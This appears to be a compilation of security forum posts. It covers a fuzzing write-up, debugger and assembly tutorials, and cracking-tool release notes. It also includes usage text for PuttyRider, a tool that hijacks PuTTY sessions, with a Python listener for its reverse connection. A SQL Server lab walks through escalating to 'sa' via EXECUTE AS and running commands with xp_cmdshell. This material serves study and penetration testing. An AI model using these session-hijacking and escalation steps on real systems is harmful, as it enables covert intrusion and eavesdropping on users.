Despite The Pirate Bay's efforts to escape an increasingly hostile environment in Sweden, the torrent site has been taken offline today. TorrentFreak and Swedish paper Dagens Nyheter report this is the result of a police raid, as confirmed by Fredrick Ingblad, a special prosecutor for file-sharing cases. The Rights Alliance, a local group backed by the music and film industries, took credit for the shutdown, claiming its criminal complaint led to the action, and called The Pirate Bay an illegal commercial service. Only time will tell if this shutdown sticks, but TorrentFreak says it is also affecting the site's forum Suprbay, as well as Bayimg.com and Pastebay.net.

[image credit: shutterstock]

Sursa: Swedish police raid The Pirate Bay and knock the site offline
-
The presentations are somewhat non-technical. Yes, I know, there are probably far more people interested in what journalist X did, but there are also people interested in kernel exploitation.
-
PuttyRider

Hijack Putty sessions in order to sniff conversations and inject Linux commands.

Download

PuttyRider-bin.zip

Documentation

Defcamp 2014 presentation - pdf

Usage

Operation modes:
-l          List the running Putty processes and their connections
-w          Inject in all existing Putty sessions and wait for new sessions to inject in those also
-p PID      Inject only in the existing Putty session identified by PID. If PID==0, inject in the first Putty found
-x          Cleanup. Remove the DLL from all running Putty instances
-d          Debug mode. Only works with -p mode
-c CMD      Automatically execute a Linux command after successful injection.
            PuttyRider will remove trailing spaces and the '&' character from CMD.
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
-h          Print this help

Output modes:
-f          Write all Putty conversations to a file in the local directory. The filename will have the PID of the current putty.exe appended
-r IP:PORT  Initiate a reverse connection to the specified machine and start an interactive session

Interactive commands (after you receive a reverse connection):
!status     See if the Putty window is connected to user input
!discon     Disconnect the main Putty window so it won't display anything.
            This is useful to send commands without the user noticing
!recon      Reconnect the Putty window to its normal operation mode
CMD         Linux shell commands
!exit       Terminate this connection
!help       Display help for client connection

Compiling

Use the Visual Studio Command Prompt:

nmake main dll

Acknowledgements

Thanks to Brett Moore of Insomnia Security for his proof of concept PuttyHijack

Sursa: https://github.com/seastorm/PuttyRider
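For the -r IP:PORT output mode you need something listening on the attacker machine before injecting; nc works, but a minimal Python listener (the host/port values are examples, and the helper names are mine) looks like this:

```python
import socket

def start_listener(host="0.0.0.0", port=4444):
    """Bind the rendezvous socket that PuttyRider's -r mode connects back to."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv

def collect_session(srv):
    """Accept one reverse connection and return everything the client sends."""
    conn, addr = srv.accept()
    chunks = []
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    finally:
        conn.close()
        srv.close()
    return b"".join(chunks)
```

An interactive session would also relay your keystrokes back over conn (to send !status, !discon and so on); this sketch only captures the incoming side.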
-
[h=1]Hackfest 2014: Jason Gillam presented "Web Penetration Testing with Burp and CO2"[/h]

Slides: http://www.hackfest.ca/conf2014/web-p...
Talk description: http://www.hackfest.ca/speaker/jason-...

Hackfest: Hackfest.ca >> Hackfest November 7th & 8th 2014 | A bilingual event and the biggest security event held in Quebec, Canada in November, featuring HackingGames, technical conferences and more!

Presented by: Hackfest communication
Logo by Hackfest Communication & CC flickr jdhancock
-
CVE-2014-1824 – A New Windows Fuzzing Target

Posted November 25, 2014 BeyondTrust Research Team

As time progresses, due to constant fuzzing and auditing, many common Microsoft products are becoming reasonably hard targets in which to find interesting crashes. There are two solutions to this: write a better fuzzer (american fuzzy lop) or pick a less audited target. In a search for less audited attack surface, we are brought to MS14-038, Vulnerability in Windows Journal Could Allow Remote Code Execution (2975689). Before we start attacking this application, we would like to understand the vulnerability addressed by MS14-038. Windows Journal is a tablet component shipped with Windows from Vista onward, meant for taking notes and such. It has a file association of ‘.jnt’. The bulletin doesn’t give too much information, but reveals the problem is some kind of parsing issue. The patch seems to address issues in NBDoc.dll, so let’s look at the bindiff of the pre/post-patch versions. The diff is ugly: many functions have changed and a few have been added/removed. So where do we go from here? Looking at the individual changes, we come across a few fixes that look security related, but after numerous dead ends, one is more attractive than the rest – sub_2ECE0B90. A high-level view of this function is seen below. This function is somewhat big and has quite a few changes, but is interesting for a couple of reasons: First off, apart from some structural changes, there are several calls to memcpy in the unpatched function. Only one of these has been converted to a memcpy_s in the patched function, the count of which is now passed in as an argument to the function. Secondly, the function looks like it contains some kind of magic value at the top. In the very first basic block, further processing is determined by a call to strncmp, searching for the string “PTC+MSHM”. Perhaps this could be a useful marker to search for.
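Scanning a sample for that marker is a one-liner's worth of work; a sketch (the context length and hex formatting are my choices, not from the write-up):

```python
MARKER = b"PTC+MSHM"

def find_marker(data, context=16):
    """Return (offset, hex of the bytes right after the marker) for each hit."""
    hits = []
    pos = data.find(MARKER)
    while pos != -1:
        tail = data[pos + len(MARKER):pos + len(MARKER) + context]
        hits.append((pos, tail.hex()))
        pos = data.find(MARKER, pos + 1)
    return hits
```

Run against a .jnt sample, the trailing bytes of each hit are where size fields of the blob would show up.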
Assuming that this string is in fact a marker for a path to the vulnerable function, we perform a quick Google search. After digging around on archive-ro.com, we end up with a link to a journal file: http://www.phys.ubbcluj.ro/~vasile.chis/cursuri/info/c1.jnt Popping this file open in a hex editor, we get dozens of hits for PTC+MSHM on a free-text search. We now proceed dynamically, attempting to trigger a breakpoint in the affected function. We set one in the first block of the function of the unpatched DLL, near the call to strncmp on “PTC+MSHM”. Upon hitting it the first time, the str1 argument looks like this: Grabbing all the bytes up to the second occurrence of 0f61 and flipping the endianness, we get two hits in our hex editor, one at offset 0x04df and one at offset 0x2bcb. The second hit differs from the dump, lacking the next word 0b70. So it looks like we are handling this blob at offset 0x04df in the file during the first function call. Continuing on, we set a breakpoint above the memcpy of interest at the top of the block. After some stepping we get to this situation: Well, that 0x0b70 looks familiar… Furthermore, it appears to be pushed as the size parameter to the memcpy. Let’s modify the initial file, changing 700B to FFFF. Restarting the application and opening our modified file, we receive an access violation. So as hoped, we crash in the memcpy and have exercised the vulnerable code. More than this particular vulnerability we are trying to isolate, this crash seems to indicate less audited code than, say, MS Word. With visions of unbounded memcpys in our eyes, we fired a dumb fuzzer at the current version of Journal – and as expected it fell over pretty quickly and in several unique ways — we encourage you to do the same.

Sursa: CVE-2014-1824 – A New Windows Fuzzing Target | BeyondTrust
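The "dumb fuzzer" approach described above needs very little: take a valid .jnt, flip some bytes, feed it to Journal, watch for crashes. The mutation step can be sketched as follows (the ratio and seeding are illustrative; the harness that launches Journal and detects crashes is left out):

```python
import random

def mutate(sample, ratio=0.01, seed=None):
    """Overwrite a fraction of the bytes in sample at random positions."""
    rng = random.Random(seed)
    data = bytearray(sample)
    flips = max(1, int(len(data) * ratio))
    for _ in range(flips):
        data[rng.randrange(len(data))] = rng.randrange(256)
    return bytes(data)
```

Seeding the generator makes a crashing test case reproducible from its seed alone, which is handy when triaging the "several unique ways" a target falls over.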
-
Writing a Primitive Debugger: Part 3 (Call Stack, Registers, Contexts)

Posted on December 5, 2014 by admin

Up to now, all of the functionality discussed in writing a debugger has been related to getting a debugger attached to a process and being able to set breakpoints and perform single stepping. While certainly useful, this functionality is more passive debugging: you can break the state of the process at a certain point and instrument it at the instruction level, but you cannot actually modify any behavior, or even view how the process got into that state. The next core functionality that will be covered will detail actually being able to view and change program execution state (in the form of the thread context, namely registers), and being able to view the thread’s call stack upon hitting a breakpoint.

Thread Contexts

A thread context, as defined for Windows, “includes the thread’s set of machine registers, the kernel stack, a thread environment block, and a user stack in the address space of the thread’s process.” For a usermode debugger, which is what is being developed in these posts, the important parts are the machine registers and the user stack. The thread environment block is also accessible from user mode but won’t be covered here due to its undocumented and very specific nature. When a process starts up, the loader will set up the process’s main thread and begin execution at the entry point. This main thread can in turn launch additional threads, which themselves can launch threads, and so on. Each of these threads will have its own context containing the items listed above. The purpose of these contexts is that Windows, being a preemptive multitasking operating system, can have any [usermode] task, such as a thread executing code, interrupted at any point in time. During these interruptions, a context switch will be carried out, which is simply the process of saving the current execution context and setting the new one to execute.
Eventually, when the original task is scheduled to resume, a context switch will again occur back to the context of the original thread and it will continue executing as if nothing had happened. What do these contexts look like? The answer is that it is entirely processor-specific, which shouldn’t be too surprising given that they store registers. In Windows, the part of the thread context that is available to developers is defined as a CONTEXT structure in winnt.h. For example, below is a snippet from a CONTEXT structure for x86 processors.

typedef struct _CONTEXT {
    DWORD Dr0;
    DWORD Dr1;
    DWORD Dr2;
    ...
    FLOATING_SAVE_AREA FloatSave;
    DWORD SegGs;
    DWORD SegFs;
    ...
    DWORD Edi;
    DWORD Esi;
    DWORD Ebx;
    ...
    DWORD Ebp;
    DWORD Eip;
    ...

The x64 version looks closely related, with register widths extended to 64 bits as well as additional registers and extensions added.

typedef struct DECLSPEC_ALIGN(16) _CONTEXT {
    DWORD ContextFlags;
    DWORD MxCsr;
    ...
    WORD SegGs;
    WORD SegSs;
    DWORD EFlags;
    ...
    DWORD64 Rax;
    DWORD64 Rcx;
    DWORD64 Rdx;
    ...
    DWORD64 R13;
    DWORD64 R14;
    DWORD64 R15;
    ...

This is the structure that will be the most useful to inspect and modify when debugging. A debugger should be able to print out this structure and allow for modification of any of its fields. Fortunately, there are two very useful APIs for retrieving and modifying this structure: GetThreadContext and SetThreadContext. These have been covered previously when discussing how to enable single-stepping. So what modifications are needed to the existing code/logic in order to add this functionality? It’s as simple as opening a handle to the currently executing (or in the debugger’s case, broken) thread and retrieving/setting the context.
const CONTEXT Debugger::GetExecutingContext()
{
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_ALL;
    SafeHandle hThread = OpenCurrentThread();
    if (hThread.IsValid())
    {
        bool bSuccess = BOOLIFY(GetThreadContext(hThread(), &ctx));
        if (!bSuccess)
        {
            fprintf(stderr, "Could not get context for thread %X. Error = %X\n",
                m_dwExecutingThreadId, GetLastError());
        }
    }
    memcpy(&m_lastContext, &ctx, sizeof(CONTEXT));
    return ctx;
}

const bool Debugger::SetExecutingContext(const CONTEXT &ctx)
{
    bool bSuccess = false;
    SafeHandle hThread = OpenCurrentThread();
    if (hThread.IsValid())
    {
        bSuccess = BOOLIFY(SetThreadContext(hThread(), &ctx));
    }
    memcpy(&m_lastContext, &ctx, sizeof(CONTEXT));
    return bSuccess;
}

For each access or modification, there is a handle opened (and closed) to the current thread — this certainly isn’t the most efficient approach, but serves well enough for demo purposes. The state of the context is then stored in m_lastContext. These functions are invoked when the process receives an EXCEPTION_BREAKPOINT and when single stepping the process, i.e. handling the EXCEPTION_SINGLE_STEP exception. Therefore, m_lastContext will always have the appropriate register values in the context structure when a breakpoint is hit or when the user is single stepping. These functions can also be invoked when the user wants to modify a certain register or registers through the debugger interface. Printing the context involves nothing more than printing out the values in the structure.
I’ve chosen to only print out the more commonly used registers for the example code:

void Debugger::PrintContext()
{
#ifdef _M_IX86
    fprintf(stderr,
        "EAX: %p EBX: %p ECX: %p EDX: %p\n"
        "ESP: %p EBP: %p ESI: %p EDI: %p\n"
        "EIP: %p FLAGS: %X\n",
        m_lastContext.Eax, m_lastContext.Ebx, m_lastContext.Ecx, m_lastContext.Edx,
        m_lastContext.Esp, m_lastContext.Ebp, m_lastContext.Esi, m_lastContext.Edi,
        m_lastContext.Eip, m_lastContext.EFlags);
#elif defined _M_AMD64
    fprintf(stderr,
        "RAX: %p RBX: %p RCX: %p RDX: %p\n"
        "RSP: %p RBP: %p RSI: %p RDI: %p\n"
        "R8: %p R9: %p R10: %p R11: %p\n"
        "R12: %p R13: %p R14: %p R15: %p\n"
        "RIP: %p FLAGS: %X\n",
        m_lastContext.Rax, m_lastContext.Rbx, m_lastContext.Rcx, m_lastContext.Rdx,
        m_lastContext.Rsp, m_lastContext.Rbp, m_lastContext.Rsi, m_lastContext.Rdi,
        m_lastContext.R8, m_lastContext.R9, m_lastContext.R10, m_lastContext.R11,
        m_lastContext.R12, m_lastContext.R13, m_lastContext.R14, m_lastContext.R15,
        m_lastContext.Rip, m_lastContext.EFlags);
#else
#error "Unsupported architecture"
#endif
}

Call Stacks

At the lowest level, the scope of a function is defined by its stack frame. This is a compiler- and/or ABI-defined construct for how the state of the function will be laid out. A stack frame typically includes the return address of the caller, any parameters that were passed to the function from the caller, and space for local variables that exist within the scope of the function. For x86 and x64, among other architectures, these stack frames are preceded by a prologue, which is the code responsible for setting up the stack and frame pointers (ESP/EBP or RSP/RBP) from the caller to the callee. Prior to the callee returning, there is an epilogue, which is responsible for returning the stack and frame pointers to those of the caller.
For example, consider the following C function:

void TestFunction(int a, int b, int c)
{
    int d = 4, e = 5, f = 6;
}

which was called in the following way:

push 3
push 2
push 1
call TestFunction

Disassembled as x86, this becomes:

push ebp
mov ebp,esp
sub esp,0Ch
mov dword ptr [ebp-4],4
mov dword ptr [ebp-8],5
mov dword ptr [ebp-0Ch],6
mov esp,ebp
pop ebp
ret 0Ch

The first three instructions are the prologue and the last three the epilogue. After the execution of the prologue, the stack frame for this function will contain the caller's frame pointer in [EBP], the return address at [EBP+4] (because the CALL instruction implicitly pushes the address of the next instruction onto the stack before changing execution), and the passed parameters at [EBP+8], [EBP+12], and [EBP+16]. The prologue subtracted 12 from the base of the stack to make room for local variables — the three 32-bit ints declared within the function. These will be at [EBP-4], [EBP-8], and [EBP-12], as can be seen in the disassembly. This setup is pretty convenient because it offers an easy distinction between what is a parameter and what is a local variable. Debugging becomes a bit easier since everything is held on the stack and indexed through the frame pointer, rather than scattered around between registers and the stack. This changes a bit as you go from x86 to x64, where x64 will pass the first four (or six, depending on your compiler/platform) arguments in registers, and the rest on the stack. This can also change a bit depending on calling conventions and compiler optimizations, especially frame-pointer omission. Since each stack frame stores the return address of its caller, it is possible to see where the function was called from. That is what the call stack is: a collection of stack frames that represent the call chain in the code leading up to the current stack frame.
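In the plain EBP-chain case above, walking the stack is just pointer chasing: [EBP] holds the caller's saved EBP and [EBP+4] the return address. The following Python sketch simulates that walk over a fake little-endian x86 stack image (a real debugger must read the target's memory and cope with frame-pointer omission, which is exactly why StackWalk64 exists):

```python
import struct

def walk_ebp_chain(stack, base, ebp, max_frames=50):
    """Walk saved-EBP links in a little-endian x86 stack image.

    stack: bytes of the stack region, base: the address it is mapped at,
    ebp: current frame pointer. Returns the list of return addresses.
    """
    frames = []
    for _ in range(max_frames):
        off = ebp - base
        if off < 0 or off + 8 > len(stack):
            break  # frame pointer left the captured region
        saved_ebp, ret_addr = struct.unpack_from("<II", stack, off)
        if ret_addr == 0:
            break  # hit an unlinked/terminating frame
        frames.append(ret_addr)
        if saved_ebp <= ebp:
            break  # the chain must move toward higher addresses
        ebp = saved_ebp
    return frames
```

Each iteration corresponds to one StackWalk64 call in the loop shown below: read the frame, record where it will return to, then follow the saved link to the caller's frame.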
This information is very useful to have in terms of debugging, because a bug that presented itself in one function may have manifested earlier on in the code. Being able to quickly traverse frames, and see the values within those frames, is an invaluable aid to debugging. On the Windows platform, there is a convenient function that performs the tedium/annoyance of walking stack frames backwards: StackWalk64. This function is x86 and x64 compatible, but does require some setup prior to being invoked. Given the very machine-specific layout of stack frames, the StackWalk64 function requires filling out a STACKFRAME64 structure, which will be passed to it as an argument. Filling out this structure merely involves setting the instruction, frame, and stack pointers, along with the address modes, which will be flat addressing for the case of modern Windows on x86 and x64. Once this structure is set up, StackWalk64 can be called in a loop to retrieve the frames. Put into code, it looks like the following:

void Debugger::PrintCallStack()
{
    STACKFRAME64 stackFrame = { 0 };
    const DWORD_PTR dwMaxFrames = 50;
    CONTEXT ctx = GetExecutingContext();
    stackFrame.AddrPC.Mode = AddrModeFlat;
    stackFrame.AddrFrame.Mode = AddrModeFlat;
    stackFrame.AddrStack.Mode = AddrModeFlat;
#ifdef _M_IX86
    DWORD dwMachineType = IMAGE_FILE_MACHINE_I386;
    stackFrame.AddrPC.Offset = ctx.Eip;
    stackFrame.AddrFrame.Offset = ctx.Ebp;
    stackFrame.AddrStack.Offset = ctx.Esp;
#elif defined _M_AMD64
    DWORD dwMachineType = IMAGE_FILE_MACHINE_AMD64;
    stackFrame.AddrPC.Offset = ctx.Rip;
    stackFrame.AddrFrame.Offset = ctx.Rbp;
    stackFrame.AddrStack.Offset = ctx.Rsp;
#else
#error "Unsupported platform"
#endif
    SafeHandle hThread = OpenCurrentThread();
    for (int i = 0; i < dwMaxFrames; ++i)
    {
        const bool bSuccess = BOOLIFY(StackWalk64(dwMachineType, m_hProcess(), hThread(),
            &stackFrame, (dwMachineType == IMAGE_FILE_MACHINE_I386 ?
            nullptr : &ctx), nullptr, SymFunctionTableAccess64, SymGetModuleBase64, nullptr));
        if (!bSuccess || stackFrame.AddrPC.Offset == 0)
        {
            fprintf(stderr, "StackWalk64 finished.\n");
            break;
        }
        fprintf(stderr,
            "Frame: %X\n"
            "Execution address: %p\n"
            "Stack address: %p\n"
            "Frame address: %p\n",
            i, stackFrame.AddrPC.Offset, stackFrame.AddrStack.Offset, stackFrame.AddrFrame.Offset);
    }
}

Testing the functionality

To test this functionality we can create another demo app that will be used as the debug target. The simple one below is what I used:

#include <cstdio>

void d()
{
    printf("d called.\n");
}

void c()
{
    printf("c called.\n");
    d();
}

void b()
{
    printf("b called.\n");
    c();
}

void a()
{
    printf("a called.\n");
    b();
}

int main(int argc, char *argv[])
{
    printf("Addresses: \n"
        "a: %p\n"
        "b: %p\n"
        "c: %p\n"
        "d: %p\n",
        a, b, c, d);
    getchar();
    while (true)
    {
        a();
        getchar();
    }
    return 0;
}

I would recommend disabling incremental linking and ASLR (on the executable, not the system) for convenience's sake. Below is the stack trace that Visual Studio produces when a breakpoint is set inside the d function and hit.

Demo.exe!d() Line 5 C++
Demo.exe!c() Line 14 C++
Demo.exe!b() Line 20 C++
Demo.exe!a() Line 26 C++
Demo.exe!main(int argc, char * * argv) Line 41 C++
Demo.exe!__tmainCRTStartup() Line 626 C
Demo.exe!mainCRTStartup() Line 466 C
kernel32.dll!@BaseThreadInitThunk@12() Unknown
ntdll.dll!___RtlUserThreadStart@8() Unknown
ntdll.dll!__RtlUserThreadStart@8() Unknown

Attaching with the debugger also yields 10 frames, as listed below:

a
Target address: 0x4010f0
Received breakpoint at address 004010F0
Press c to continue or s to begin stepping.
l
Frame: 0
Execution address: 004010F0
Stack address: 00000000
Frame address: 0018FBE4
Frame: 1
Execution address: 004010DA
Stack address: 00000000
Frame address: 0018FBE8
Frame: 2
Execution address: 0040108A
Stack address: 00000000
Frame address: 0018FCBC
Frame: 3
Execution address: 0040103A
Stack address: 00000000
Frame address: 0018FD90
Frame: 4
Execution address: 004011C6
Stack address: 00000000
Frame address: 0018FE64
Frame: 5
Execution address: 00401699
Stack address: 00000000
Frame address: 0018FF38
Frame: 6
Execution address: 004017DD
Stack address: 00000000
Frame address: 0018FF88
Frame: 7
Execution address: 75D5338A
Stack address: 00000000
Frame address: 0018FF90
Frame: 8
Execution address: 77339F72
Stack address: 00000000
Frame address: 0018FF9C
Frame: 9
Execution address: 77339F45
Stack address: 00000000
Frame address: 0018FFDC
StackWalk64 finished.

The output is a bit less elegant than the Visual Studio debugger's, but it is correct, which is the more important part. It would be nice, however, to put names to some of those addresses. That is where symbol loading and mapping come in, which will be the subject of the next post.

Article Roadmap

Future posts will cover topics closely following the items below:

Basics
Adding/Removing Breakpoints, Single-stepping
Call Stack, Registers, Contexts
Symbols
Miscellaneous Features

The full source code relating to this can be found here. C++11 features were used, so MSVC 2012/2013 is most likely required.

Sursa: Writing a Primitive Debugger: Part 3 (Call Stack, Registers, Contexts) | RCE Endeavors
-
Say hello to x64 Assembly [part 1]
Nytro posted a topic in Reverse engineering & exploit development
Say hello to x64 Assembly [part 1]

Introduction

There are many developers among us. We write tons of code every day; sometimes it's even not bad code. Any of us can easily write the simplest code like this:

#include <stdio.h>

int main() {
    int x = 10;
    int y = 100;
    printf("x + y = %d", x + y);
    return 0;
}

Every one of us can understand what this C code does. But... how does this code work at a low level? I think that not all of us can answer that question, and me neither. I thought that I could write code in high-level programming languages like Haskell, Erlang, Go, etc., but I absolutely didn't know how it works at a low level, after compilation. So I decided to take a few deep steps down, to assembly, and to describe my learning path along the way. Hope it will be interesting, not only for me. About 5-6 years ago I already used assembly for writing simple programs; it was in university, and I used Turbo Assembler and the DOS operating system. Now I use a Linux x86-64 operating system, and yes, there is a big difference between 64-bit Linux and 16-bit DOS. So let's start.

Preparation

Before we start, we must prepare a few things. As I wrote above, I use Ubuntu (Ubuntu 14.04.1 LTS 64 bit), so my posts will be for this operating system and architecture. Different CPUs support different sets of instructions; I use an Intel Core i7 870 processor, and all code will be written for this processor. Also I will use the NASM assembler. You can install it with:

sudo apt-get install nasm

Its version must be 2.0.0 or greater. I use NASM version 2.10.09, compiled on Dec 29 2013. Lastly, you will need a text editor in which to write your assembly code. I use Emacs with nasm-mode.el. It is not mandatory; of course you can use your favourite text editor.
If you use Emacs like me, you can download nasm-mode.el and configure Emacs like this:

(load "~/.emacs.d/lisp/nasm.el")
(require 'nasm-mode)
(add-to-list 'auto-mode-alist '("\\.\\(asm\\|s\\)$" . nasm-mode))

That's all we need for the moment. Other tools will be described in future posts.

x64 syntax

I will not describe the full assembly syntax here; we'll mention only those parts of the syntax that we will use in this post. Usually a NASM program is divided into sections. In this post we'll meet the following two sections:

data section
text section

The data section is used for declaring constants. This data does not change at runtime. You can declare various math or other constants here. The syntax for declaring the data section is:

section .data

The text section is for code. This section must begin with the declaration global _start, which tells the kernel where program execution begins.

section .text
global _start
_start:

Comments start with the ; symbol. Every NASM source code line contains some combination of the following four fields:

[label:] instruction [operands] [; comment]

Fields which are in square brackets are optional. A basic NASM instruction consists of two parts: the first is the name of the instruction to be executed, and the second is its operands. For example:

MOV COUNT, 48 ; Put value 48 in the COUNT variable

Hello world

Let's write our first program with NASM. Of course it will be the traditional Hello world program. Here is its code:

section .data
    msg db "hello, world!"

section .text
    global _start
_start:
    mov rax, 1
    mov rdi, 1
    mov rsi, msg
    mov rdx, 13
    syscall
    mov rax, 60
    mov rdi, 0
    syscall
Yes, it doesn't look like printf("Hello world"). Let's try to understand what it is and how it works. Take a look at lines 1-2: we defined the data section and put the msg constant with the "hello, world!" value there. Now we can use this constant in our code. Next is the declaration of the text section and the entry point of the program. The program will start to execute from line 7. Now starts the most interesting part. We already know what the mov instruction is: it takes 2 operands and puts the value of the second into the first. But what are these rax, rdi, etc.? As we can read on Wikipedia:

A central processing unit (CPU) is the hardware within a computer that carries out the instructions of a computer program by performing the basic arithmetical, logical, and input/output operations of the system.

OK, the CPU performs some operations, arithmetical and so on. But where can it get the data for these operations? The first answer is memory. However, reading data from and storing data into memory slows down the processor, as it involves complicated processes of sending the data request across the control bus. Thus the CPU has its own internal memory storage locations, called registers. So when we write mov rax, 1, it means: put 1 into the rax register. Now we know what rax, rdi, rbx, etc. are, but we also need to know when to use rax and when rsi, and so on:

rax - temporary register; when we call a syscall, rax must contain the syscall number
rdx - used to pass the 3rd argument to functions
rdi - used to pass the 1st argument to functions
rsi - pointer used to pass the 2nd argument to functions

In other words, we are simply making a call to the sys_write syscall. Take a look at sys_write:

ssize_t sys_write(unsigned int fd, const char *buf, size_t count)

It has 3 arguments:

fd - file descriptor.
Can be 0, 1 and 2 for standard input, standard output and standard error
buf - points to the character array holding the data to be written
count - specifies the number of bytes to be written from the buffer

So we know that the sys_write syscall takes three arguments and has number one in the syscall table. Let's look again at our hello world implementation. We put 1 into the rax register, which means we will use the sys_write system call. On the next line we put 1 into the rdi register; this will be the first argument of sys_write: 1 for standard output. Then we store the pointer to msg in the rsi register; it will be the second (buf) argument of sys_write. Then we pass the last (third) parameter (the length of the string) in rdx; it will be the third argument of sys_write. Now that we have all the arguments of sys_write, we can invoke it with the syscall instruction on line 11. OK, we printed the "hello, world!" string; now we need to exit from the program correctly. We pass 60 to the rax register: 60 is the number of the exit syscall. We also pass 0 to the rdi register; this will be the exit code, and with 0 our program should exit successfully. That's all for "Hello world". Quite simple. Now let's build our program. Say we have this code in the hello.asm file. Then we need to execute the following commands:

nasm -f elf64 -o hello.o hello.asm
ld -o hello hello.o

After that we will have an executable hello file which we can run with ./hello, and we will see the "hello, world!" string in the terminal.

Conclusion

This was the first part, with one very simple example. In the next part we will see some arithmetic. If you have any questions/suggestions, write me a comment. All source code you can find - here.

Sursa: Code as Art: Say hello to x64 Assembly [part 1]
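The same sys_write plumbing can be poked at from Python through libc's syscall(2) wrapper; this is a sketch assuming an x86-64 Linux host, where the write syscall number is 1, exactly as in the mov rax, 1 above (sys_exit, number 60, is left out since it would kill the interpreter):

```python
import ctypes

libc = ctypes.CDLL(None, use_errno=True)

SYS_WRITE = 1  # x86-64 Linux syscall number; matches 'mov rax, 1' in the assembly


def sys_write(fd, data):
    """Invoke write(2) by raw syscall number, like the NASM example does."""
    buf = ctypes.create_string_buffer(data, len(data))
    # syscall(number, fd, buf, count) -> bytes written, or -1 on error
    return libc.syscall(SYS_WRITE, fd, buf, len(data))
```

Calling sys_write(1, b"hello, world!") performs the same register setup the assembly does: syscall number in rax, fd in rdi, buffer pointer in rsi, length in rdx.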
Hydra Network Logon Cracker 8.1 Authored by van Hauser, thc | Site thc.org THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus. Changes: Multiple patches added. The -M option is fixed. Various other small fixes and enhancements. Download: Hydra Network Logon Cracker 8.1 ≈ Packet Storm Sursa: Hydra Network Logon Cracker 8.1 ≈ Packet Storm
-
THC Smartbrute 1.0 Authored by thc | Site thc.org THC-smartbrute is a smart card instruction bruteforcing tool. Download: THC Smartbrute 1.0 ≈ Packet Storm Sursa: THC Smartbrute 1.0 ≈ Packet Storm
-
[h=2]Hacking SQL Server Stored Procedures – Part 2: User Impersonation[/h] Scott Sutherland | December 8, 2014 Application developers often use SQL Server stored procedures to make their code more modular, and to help apply the principle of least privilege. Occasionally those stored procedures need to access resources external to their application's database. To satisfy that requirement, developers sometimes use the IMPERSONATE privilege and the EXECUTE AS statement to allow the impersonation of other logins on demand. Although this isn't really a vulnerability, this type of weak configuration often leads to privilege escalation. This blog provides a lab guide and attack walk-through that can be used to gain a better understanding of how the IMPERSONATE privilege can lead to privilege escalation in SQL Server. This should be interesting to penetration testers, application developers, and dev-ops. However, it will most likely be pretty boring to DBAs that know what they're doing. Below is a summary of the topics being covered: Setting up a Lab Finding SQL Server Logins that can be Impersonated Impersonating SQL Logins and Domain Accounts Automating Escalation with Metasploit and PowerShell Alternatives to Impersonation [h=2]Setting up a Lab[/h] Below I've provided some basic steps for setting up a SQL Server instance that can be used to replicate the scenario covered in this blog. Download the Microsoft SQL Server Express install that includes SQL Server Management Studio. It can be downloaded at Download Microsoft SQL Server 2014 Express. Install SQL Server by following the wizard, but make sure to enable mixed-mode authentication and run the service as LocalSystem for the sake of the lab. Make sure to enable the tcp protocol so that we can connect to the listener remotely. Instructions can be found at How to: Configure Express to accept remote connections - SQL Server Express WebLog - Site Home - MSDN Blogs.
Log into the SQL Server with the "sa" account set up during the installation, using the SQL Server Management Studio application that comes with SQL Server. Press the "New Query" button and use the TSQL below to create the new users for the lab.

-- Create login 1
CREATE LOGIN MyUser1 WITH PASSWORD = 'MyPassword!';
-- Create login 2
CREATE LOGIN MyUser2 WITH PASSWORD = 'MyPassword!';
-- Create login 3
CREATE LOGIN MyUser3 WITH PASSWORD = 'MyPassword!';
-- Create login 4
CREATE LOGIN MyUser4 WITH PASSWORD = 'MyPassword!';

Provide the MyUser1 login with permissions to impersonate MyUser2, MyUser3, and sa.

-- Grant myuser1 impersonate privilege on myuser2, myuser3, and sa
USE master;
GRANT IMPERSONATE ON LOGIN::sa to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1];
GO

[h=2]Finding SQL Server Logins that can be impersonated[/h] The first step to impersonating another login is finding which ones your account is allowed to impersonate. By default, sysadmins can impersonate anyone, but normal logins must be assigned privileges to impersonate specific users. Below are the instructions for finding out which users you can impersonate. Log into the SQL Server as the MyUser1 login using SQL Server Management Studio. Run the query below to get a list of logins that can be impersonated by the "MyUser1" login.

-- Find users that can be impersonated
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'

Below is a screenshot of the expected results.
Note: In the example above, the query is being executed via a direct database connection, but in the real world external attackers are more likely to execute it via SQL injection. [h=2]Impersonating SQL Logins and Domain Accounts[/h] Now that we have a list of logins that we know we can impersonate, we can start escalating privileges. In this section I'll show how to impersonate users, revert to your original user, and impersonate domain users (like the domain admin). Fun fun fun… [h=3]Impersonating SQL Server Logins[/h] Log into the SQL Server using the MyUser1 login (if you're not already). Verify that you are running as a SQL login that does not have the sysadmin role. Then run EXECUTE AS to impersonate the sa login that was identified in the last section.

-- Verify you are still running as the myuser1 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Impersonate the sa login
EXECUTE AS LOGIN = 'sa'
-- Verify you are now running as the sa login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

Below is an example of the expected output. Now you should be able to access any database and enable/run xp_cmdshell to execute commands on the operating system as the SQL Server service account (LocalSystem). Below is some example code.

-- Enable show options
EXEC sp_configure 'show advanced options',1
RECONFIGURE
GO
-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
GO
-- Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'

Below is an example of the expected output: Tada! In this scenario we were able to become the sysadmin "sa". You may not always get a sysadmin account right out of the gate, but at a minimum you should get additional data access when impersonating other logins.
